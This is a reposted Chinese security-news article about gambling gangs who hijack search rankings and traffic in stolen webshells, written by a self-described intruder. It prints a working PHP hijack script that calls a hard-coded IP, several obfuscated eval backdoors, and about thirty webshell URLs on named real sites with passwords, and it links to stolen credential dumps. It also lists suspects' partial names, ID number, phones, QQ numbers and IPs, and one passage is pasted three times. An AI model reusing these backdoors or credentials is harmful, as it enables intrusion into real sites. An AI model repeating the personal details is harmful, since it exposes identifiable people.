[轉]中國最大的Webshell后門箱子調查，所有公開大馬全軍覆沒

起因

對這件事情的起因是某天我滲透了一個大站，第二天進webshell時就發現，當前目錄出現了新的后門，仔細一查，發現是博彩團伙干的，網站被全局劫持黑帽程序如下代碼

set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','http:// 107.182.228.74/');

define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');

define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());

function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}

if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

看上去是針對360的，通過360去搜索site網站賭博相關的關鍵字出現的結果我驚呆了！！！！居然非常多的站被劫持，而且其中包括我滲透測試的不少站，看上去像是搜索引擎自己控制的排名一樣，其實是非法分子利用了搜索引擎的排名算法規則。通過收錄時間發現在2014年開始出現的，也就是說這個問題已經存在了多年之久，至今才暴露出來。

接下來我就開展了所有疑問的調查，因為這些東西被利用對社會影響實在太大，不僅僅我是唯一的受害者，而是這個安全圈子的所有人。

調查

找到幕后團伙

查大馬問題

分析團伙的后門特征

1.我對我手里的shell進行了一遍梳理，首先是對后門進行新的地址修改，在原來的后門地址放上了js代碼，該段代碼記錄的是相關指紋信息，以及各大網站的json獲取。此時就是靜靜的等待。

2．我對大馬又進行了一遍分析，把所有代碼讀爛了也沒任何問題，同時也對馬進行了抓包分析，沒有任何外部請求。因為一直沒發現問題，所以我特意進行了長達一周的數據包監控，還是沒有任何結果。這時候就非常納悶，既然馬沒有問題，為什么人家可以獲取到我的所有后門？難道是我的電腦被入侵？我的網絡環境除了http之外，不能做任何協議請求，而我的后門都保存在這台linux里，這點也可以排除。只好再想想是不是哪里疏忽了。

3.被該團隊劫持過的站，我都檢查了一遍，之后我發現，每個站的所有文件創建時間都會被他們更新到入侵時間，這剛好符合了

看上去是針對360的，通過360去搜索site網站賭博相關的關鍵字出現的結果我驚呆了！！！！居然非常多的站被劫持，而且其中包括我滲透測試的不少站，看上去像是搜索引擎自己控制的排名一樣，其實是非法分子利用了搜索引擎的排名算法規則。通過收錄時間發現在2014年開始出現的，也就是說這個問題已經存在了多年之久，至今才暴露出來。

接下來我就開展了所有疑問的調查，因為這些東西被利用對社會影響實在太大，不僅僅我是唯一的受害者，而是這個安全圈子的所有人。

調查

找到幕后團伙

查大馬問題

分析團伙的后門特征

1.我對我手里的shell進行了一遍梳理，首先是對后門進行新的地址修改，在原來的后門地址放上了js代碼，該段代碼記錄的是相關指紋信息，以及各大網站的json獲取。此時就是靜靜的等待。

2．我對大馬又進行了一遍分析，把所有代碼讀爛了也沒任何問題，同時也對馬進行了抓包分析，沒有任何外部請求。因為一直沒發現問題，所以我特意進行了長達一周的數據包監控，還是沒有任何結果。這時候就非常納悶，既然馬沒有問題，為什么人家可以獲取到我的所有后門？難道是我的電腦被入侵？我的網絡環境除了http之外，不能做任何協議請求，而我的后門都保存在這台linux里，這點也可以排除。只好再想想是不是哪里疏忽了。

3.被該團隊劫持過的站，我都檢查了一遍，之后我發現，每個站的所有文件創建時間都會被他們更新到入侵時間，這剛好符合了

看上去是針對360的，通過360去搜索site網站賭博相關的關鍵字出現的結果我驚呆了！！！！居然非常多的站被劫持，而且其中包括我滲透測試的不少站，看上去像是搜索引擎自己控制的排名一樣，其實是非法分子利用了搜索引擎的排名算法規則。通過收錄時間發現在2014年開始出現的，也就是說這個問題已經存在了多年之久，至今才暴露出來。

接下來我就開展了所有疑問的調查，因為這些東西被利用對社會影響實在太大，不僅僅我是唯一的受害者，而是這個安全圈子的所有人。

調查

找到幕后團伙

查大馬問題

分析團伙的后門特征

1.我對我手里的shell進行了一遍梳理，首先是對后門進行新的地址修改，在原來的后門地址放上了js代碼，該段代碼記錄的是相關指紋信息，以及各大網站的json獲取。此時就是靜靜的等待。

2．我對大馬又進行了一遍分析，把所有代碼讀爛了也沒任何問題，同時也對馬進行了抓包分析，沒有任何外部請求。因為一直沒發現問題，所以我特意進行了長達一周的數據包監控，還是沒有任何結果。這時候就非常納悶，既然馬沒有問題，為什么人家可以獲取到我的所有后門？難道是我的電腦被入侵？我的網絡環境除了http之外，不能做任何協議請求，而我的后門都保存在這台linux里，這點也可以排除。只好再想想是不是哪里疏忽了。

3.被該團隊劫持過的站，我都檢查了一遍，之后我發現，每個站的所有文件創建時間都會被他們更新到入侵時間，這剛好符合了特征，也就是剛被他們入侵過的站。

如圖特征，幾乎每個站被入侵后所有創建時間都會更新一次。

之后對他們自己的后門進行了采集樣本，新的進展出現了，一共發現2波不同的團伙，但使用的大馬均為一類。（見附件1）

我對他們的馬進行了解密審計后發現，他們自己記錄大馬后門的箱子地址為api.fwqadmin.com，因為有了新的線索，所以只能暫時保存，后面再對這個進行滲透。

進展

經過兩天的等待，終於得到了該團伙的指紋信息以及QQ號，然后我就開啟大神模式進行社工，之后基本確認此人真實信息（圈內叫老袁）。然后我申請了一個QQ小號，以匿名的方式加了一些博彩導航網站上的qq，在QQ上問了好幾個人，都沒有結果，后來我干脆以做博彩的名義和他們進行深度溝通，通過溝通發現該團伙的shell都是收購來的，一個月收入幾百萬人民幣，是否真實就不得而知了。目前基本可以確認我的判斷錯誤，老袁就是唯一的線索。

我對被該團伙做劫持的所有站進行了采集，還有跳轉到他們導航的域名。首先對那些不是我的站進行了滲透入侵，采集到后門樣本，看到里面有個和我類似的大馬，但是核心變量結構不一樣，我下載回來進行審計抓包同樣沒問題，后來通過對比特征，發現大馬請求的POST參數都是一樣的，例如gopwd=密碼&godir= ，馬都沒異常，這時候初步判斷是上層網絡出現了問題，通過流量提取到大馬特征的地址，如果真是這樣就太可怕了。

我聯系到老袁了，和他進行了一些盤問式的溝通，感覺到他很害怕，他說別搞他，他以前做詐騙的。后來發了一些shell地址給我來討好我，如下列表，下面是星際團隊的：

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k        HyhbokskjGrsjhjM8hsL_hgshgK

http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm    Hys7sa5wrKKO00GSBtashras28asNNmsn18

http://www.dailiba.com/about/index.php?v=1                Tmbdcuu123uualltop

http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k                HyhbokskjGrsjhjM8hsL_hgshgK

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss        ytsadAskLs27ssJsjdasd2sS

http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw            ytsadAskLs27ssJsjdasd2sS

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k        HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dailiba.com/about/index.php?v=1                Tmbdcuu123uualltop

http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php        UTF8

http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss        ytsadAskLs27ssJsjdasd2sS

http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd        ytsadAskLs27ssJsjdasd2sS

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry            TTrsfsdh748jsusyKKOystw889sbct

http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS            UUys78tasdRhasd00iasdyTGGgahs

http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan            7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P

http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k                HyhbokskjGrsjhjM8hsL_hgshgK

http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE    77iasyw00aUUSImmsb64682301jMM!!!Qko

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php        7yhaw1woAksmjh892jsasd1sajg

http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php        7yhaw1woAksmjh892jsasd1sajg

http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google        erk12hj3nfher71h3j4k132bnnebr3hg4134

http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k                    HyhbokskjGrsjhjM8hsL_hgshgK

http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com    Tmbdcuu123uualltop

http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd            YIasdwj78954qwtyVVJsarwhahuyrwvsllps2

http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE            77iasyw00aUUSImmsb64682301jMM!!!Qkos

http://www.hotpoll.com.cn/i/index.php?v=111   heiheideheihei

星際團隊是什么鬼？難不成又是做博彩的？通過與老袁進一步溝通后發現，這些shell都是另一個做博彩的，他說是博彩圈子最大的團伙，說實話，我挺興奮的，發覺這件事越來越有趣了，我倒想看看這是些什么人。

不過現在我的目標還在“老袁”身上，因為我得找到賣他shell的人，經過一番較量之后，我得到到了真相，我也叫他提供了交易證據。此處略去不表，我會放到后面取證部分。

雖說有了shell賣家的聯系方式，可是遲遲沒添加上。這時候我又采取了另一種思路，釣魚取證，老套路，還是在大馬地址上js json，上面貼了幾段字《add me email:xxx@xxx.com I will give you all webshell》讓老袁發給讓他，以便他主動聯系我。

后來他果真訪問了幾個webshell的地址，我也抓取到了他的真實PC指紋以及代理的指紋以及QQ昵稱。之后他主動找到我，問我是不是星際團隊的，並說收到我發的郵件了。這時候我就很好奇了，莫非星際團隊也找到他了？然后他就來恐嚇我，說要抓你們（星際團隊），已經調查了星際團隊一年了。

這時候我心一想，水真深，查來查去的到底是誰在查誰呢。不過他肯定是瞞不過我的，畢竟我有他賣shell的證據，不過意想不到的是他說：“我背后都是省廳的人，你以為這些shell都是怎么來的？都是在國家機器提取的。”我勒個去，國家會干這種事嗎？國家提取網站記錄我是信，isp保留日志也是1年，至於批量提取全國網站訪問特征拿出來賣這我就不信了，要么就是黑客入侵到了運營商去提取出來的。

經過了一些溝通后，他居然一直說我是星際團隊，就把我拉黑了。后來我就主動加他說：“你是河北的吧，我已經有你犯罪證據了。”他就怕了，主動加我認慫，還發了打包好的webshell給我。這時候我又驚呆了，這簡直是逆天的節奏，居然有上萬個webshell和國內所有cms的后台登錄密碼，其中包括dedecms discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter php168等幾乎是全國所有cms都存在，而且每種的數量去重復都在上萬條，我會上傳一部分在附件。他說他背后的人的有幾十萬的discuz后台登錄賬戶密碼，我測試了他發我的一些后台，均可以登錄，其中信息包括登錄的fromhash uid 用戶名、密碼 、安全問題 、安全答案，而且都是前一天的。

到底是什么東西能記錄如此多東西而且還沒有一點異常。我看到其中也有我使用過大馬的很多站，里面還有上萬條webshell，其中有大量我的站，還有大量各種類型的大馬和不同密碼，看樣子並非我一個人受害，我進行特征匹配出來，大概有上百人的大馬不同特征。而且他發我的只是很小一部分，叫我給他錢才給我更多。這樣一想他手里的資源都有幾十萬條了吧。他說他后面的人是技術團隊，還有各種0day，是給國家干的，手里有全國的webshell，如果真是他說的這樣，那資源為什么出現在他這里了還拿出來賣？很明顯是撒謊怕我查他。我不相信，決定繼續調查。

 經過幾天的分析，這波數據和以前wooyun曝光的出來的九宮格（大家可以回溯一下2013年的http://www.dedebox.com/core/centerxxxxx.php）是一樣的，我對當時的數據也進行了打包分析，發現這波shell里面還存在部分的重復數據。而當前這個大馬和當時九宮格的登錄參數特征基本都是在Spider PHP Shell(SPS-)這款代碼的基礎上修改的，也就是說除了后門本身，這伙人還通過其他渠道來提取的大量webshell，之后通過webshell去運行了記錄后台數據的代碼寫入內存中僵死代碼，保持着只要不換服務器就常年不死的狀態，這也還是猜想，因為后台數據里面有些站的確是九宮格重復的，如果是九宮格后門的話我就有新方向可查了，以上是我進行的大致分析和調查過程。下面我就不描述過程，就直接提供數據記錄以及取證結果，交給警方去完成了。

取證

以下這幾個是團伙一（老袁）跳轉到的域名：

116305.net

559160.net

618309.net

786077.net

551809.com

www.919808.net

www.226830.com

均出自同一團伙的，只是域名不同，每個站跳轉到不同的域名分散風險罷了，其中劫持代碼里面的ip都是一樣107.182.228.74，看得出來很老練。

這幾個是模擬蜘蛛抓取劫持內容的bc logo圖片地址的ip：

210.126.27.70

pic.root1111.com

58.96.179.132

104.202.66.226

此團伙工作環境ip，都在馬來西亞（時間在10月9-號到10月26號以內的）

2016-10-26 13:00:01 ( IP 14.192.210.34 ) 馬來西亞Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:20:09 ( IP 103.6.245.143 ) 馬來西亞Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-26 13:00:25 ( IP 175.141.34.101 ) 馬來西亞Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080

2016-10-24 13:59:17 ( IP 175.136.41.251 ) 馬來西亞Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

2016-10-25 14:28:11 ( IP 175.143.101.241 ) 馬來西亞 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

2016-10-26 13:20:09  ( IP 103.6.245.143 ) 馬來西亞Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

14.192.211.116  馬來西亞

14.192.211.223 馬來西亞

175.138.234.137馬來西亞

工作PC指紋（分析此團伙有5個人）：

Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色

Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows XP, MSIE 6.0, 1126×800

Windows Server 2003, Chrome 49.0.2623, 1920×1080

Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864

此團伙首領信息

QQ 4743048XX 6410755XX

真實姓名：袁X 重慶人

手機號：159989847XX  手機MAC:18:9E:FC:11:2C:70  馬來西亞手機號：0601369589XX

他的網站：

www.badongedu.com 

 www.7cq.tv(他建立的地方論壇)

 api.fwqadmin.com(這個是他自己正在使用的大馬自己留的后門收信地址)附件會有大馬樣本有興趣的可以看看

Email:root@7cq.tv pianziso@163.com

在國內的歷史IP:

222.178.225.146(重慶市 電信)

222.178.201.12(重慶市 電信)

27.11.4.19(重慶市 聯通)

27.10.36.56(重慶市 聯通)

113.204.194.202(重慶市 聯通)

119.84.66.14(重慶市 電信)

61.161.125.77(重慶市巴南區 時代e行線網迷俱樂部李家沱店A/B館)

國內的歷史PC信息：

mac:90-2b-34-93-ad-73

操作系統：Microsoft Windows XP

顯卡：NVIDIA GeForce GT 610

CPU：AMD Athlon(tm) II X4 640 Processor 3325HZ

團伙成員信息就沒去調查了，找到他就可以了。

WebShell賣家（一切安好）信息

VPN代理 ：

110.10.176.127  韓國

2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韓國

（自己比特幣購買的主機搭建）訪問時間10月9號

真實IP：

2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海網宿科技股份有限公司聯通CDN節點 Windows NT 10.0, Chrome 47.0.2526, 1920×1080

27.186.126.196 河北省保定市 電信  真實ip可能性更大

瀏覽器指紋信息 ，一共3個不同的，但應該都是同一個人，可能電腦比較多，因為他有2個QQ

Windows NT 6.3, Chrome 45.0.2454, 1366×768 真實指紋

Windows NT 10.0, Chrome 47.0.2526, 1920×1080

Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未裝 Alexa 工具

Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色,

QQ2436449670  3496357182

Telegram：@haorenge888

此人現在開的奧迪A8，真是土豪啊，看來賺了不少錢還能逍遙法外,是河北口音即河北人。

如要查到webshell來源只有查他的幕后渠道。

他與老袁的交易信息:。

星際團伙信息

使用過的域名：

wokeda.cn 

www.98589.com 

www.356388.com 

chuan2828.com 

cnzzz.pw 

web-159.com

diyi1111.com

diyi2222.com

diyi3333.com

diyi4444.com

xinyu55.com

hongyihai.com

80268.com

5130898.com 

maimai789.com 

zhenyi58.com 

xwgy999.com 

統計代碼

document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");

            var hmt = hmt || [];

            (function() {

                var hm = document.createElement("script");

                hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";

                var s = document.getElementsByTagName("script")[0];

                s.parentNode.insertBefore(hm, s)

            })();

            callJump()

        }

    }

} if (init_flag == "93989") {

    call_init_error()

}

可以通過他們網站的統計代碼分析登錄的記錄馬來西亞的ip就是真實ip

搜索各大搜索引擎爬取跳轉到他們的站，和快照特征，竟然有超過1000個被他們劫持過的網站，其中包括了不少全國最大的新聞網站如ifeng.com china.com.cn，如果警方需要我可以提供列表

星際劫持團伙在馬來西亞，成員大概6個人左右，團伙滲透的手段包括但不限於魚叉，社工，爆破，xday，漏洞均會爬蟲批量去入侵，每次入侵后喜歡留大量的后門，防止權限掉了。

成員分工：

二名核心技術滲透人員（其中一名主要負責攻擊，入侵大型新聞類型站點。一名主要負責代碼審計，以及內部一系列php的開發，包括劫持程序，外兼入侵一些中型權重站點）

一名普通技術滲透（對掃描出漏洞的垃圾站點進行入侵）

二名負責掛劫持代碼，如果站掉了就會去恢復

一名負責bc網站上的市場兼財務，收賬出帳以及收站

核心成員在2015年12月份從馬來西亞回中國至2016年2月左右返回馬來西亞

以上是我通過圈內人員采取一些手段了解到的信息，因為這個團伙安全意識比較高，沒得到太多真實信息，但是有一位給他們做過外包的黑客可以順藤摸瓜

星際使用過的QQ ：31XXXXXX最早的時候

著名的美女黑客：YingCracker

QQ:2537789XX 9847545XX

手機: 13665XXXXXX or 13665XXXXXX

姓名: 江XX

找到這位美女黑客去了解下此團伙的情況應該會有進展

他們的后門樣本：

<?php 

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);

echo 'error';exit;?>

<?php

@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";

@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');

@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');

@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);

?>

<?php 

if($_GET['jumpvv']){

$tu="TVFsnZG9vcnB5J";

$mzd="10pOwoK";

$fc="Cg";

$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");

$nu="pqldmqFsKCRfUE9";

$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");

$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");

$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}

?>

<?php

@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";

@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");

?>

<?php

$ad = '|';$ad .='.';$ad .='*|';$ad .='e';

@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');

?>

部分我直接復制到文件夾里面了

收信地址嫌疑人信息

這次事件的特征和九宮格類似，因此我對2013年的事件進行了梳理並且對這個人進行了深入調查，可以確認兩個人，一定是其中一個人干的。

如果不是大馬的問題那么也可以從這兩個人中來了解到本次后門事件的內情，唯一的不確定性就是箱子的大馬看不出任何問題。因為和他們之前后門數據實在太像了，幾乎概括了所有的cms，記錄的后台有些也是幾年前被入侵過的九宮格箱子里面的，至今還在記錄着新的內容

嫌疑人一：

 

原來的吐司成員spider，也就是spider大馬的創始人，當時他也留過后門，追溯起來都是2011年的事情，經過調查，那時候他所公開出去的shell大馬就存在后門，而且也被他本人大量利用做游戲劫持收錄掛馬，傳聞在2012年就賺到了幾百萬身價，后來就一直低調出了大眾的視線，在圈子銷聲匿跡了。不過現在調查有新的發現，他一直在活躍着，在今年其中登錄過歷史郵箱，續費過后門的收信域名，因為他沒辦法換域名，換了就收不了shell。

Id: iamspider  iamsunchao

真實姓名：孫x

年齡：29歲（不確定）  

就讀過：自貢榮縣富西初級中學  

戶籍：成都 西昌人

QQ:80937XX（真實QQ）  8622629XX（小號）

歷史IP（可能已經過時了）

222.215.38.109(四川省內江市 電信)

61.157.123.56(四川省涼山州西昌市 電信)

222.215.39.131(四川省內江市 (隆昌縣)電信)

222.209.198.201(四川省成都市新都區 四川音樂學院附近藍天雲網吧)

嫌疑人二：

圈內的大神：toby57，曾經和他還打過交道，說是在給國家做事了，有點不太像是這件事的主謀，但是這個dedebox.com域名所有人就是他，而且他的能力足夠干這樣的事情

郵箱：toby57@163.com 也是他最常用的im

歷史ip

171.212.206.46(四川省成都市 電信)

220.166.52.45(四川省綿陽市 電信)

222.209.139.66(四川省成都市 電信)

220.166.52.45(四川省綿陽市 電信)

125.66.99.211(四川省南充市 電信)

61.157.97.82(四川省綿陽市 西南科技大學)

112.192.70.251(四川省南充市 聯通)

125.65.97.134(四川省綿陽市 電信)

61.157.97.85 (四川省綿陽市 西南科技大學)

182.139.60.17(四川省成都市 電信)

手機號：152083414XX

姓名：楊xx     

身份證號：5116211989050625xx(四川省岳池縣)

所在城市：樂山

就讀過：四川省綿陽市西南科技大學

結論

目前其實也沒什么結論，從何泄漏的全國的所有大馬以及各類cms后台后門還是個謎，因為能力太菜了。。。但是我相信這個謎警方可以解開，你們賦有足夠的權利和使命去完成打擊。否則對網民的危害太大了，那些webshell被拿去做博彩做詐騙危害就很大了，幾乎一個菠菜行業一個詐騙行業的黑帽seo源頭都來於此，如果不及時阻止危害還會無限擴大。

另外要去看被入侵的站點請到360搜索，娛樂場看最新一天收錄

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

溫馨提示：使用過任何大馬的帽子注意檢查下自己的shell，看看里面的文件時間是否統一為最近的創建時間

ps：附件為webshell部分列表，大約幾千條隨機copy。

傳送門：https://1drv.ms/u/s!AhMf1bUbIk7UanjRbtWlwOyebhU

部分受害域名列表（這個基數是去重復1W多條，未去重復大概20萬條，其中的信息量與附件類似，一個站會記錄所有的管理員登錄賬戶密碼，包括webshell的存在）

傳送門：https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZXZuVMX3fw

大家在拿到受害列表可以搜索下手里的webshell域名，如果存在那么就注意及時處理掉，以免被不法分子給你造成危害。

 

轉自:http://www.freebuf.com/news/topnews/118424.html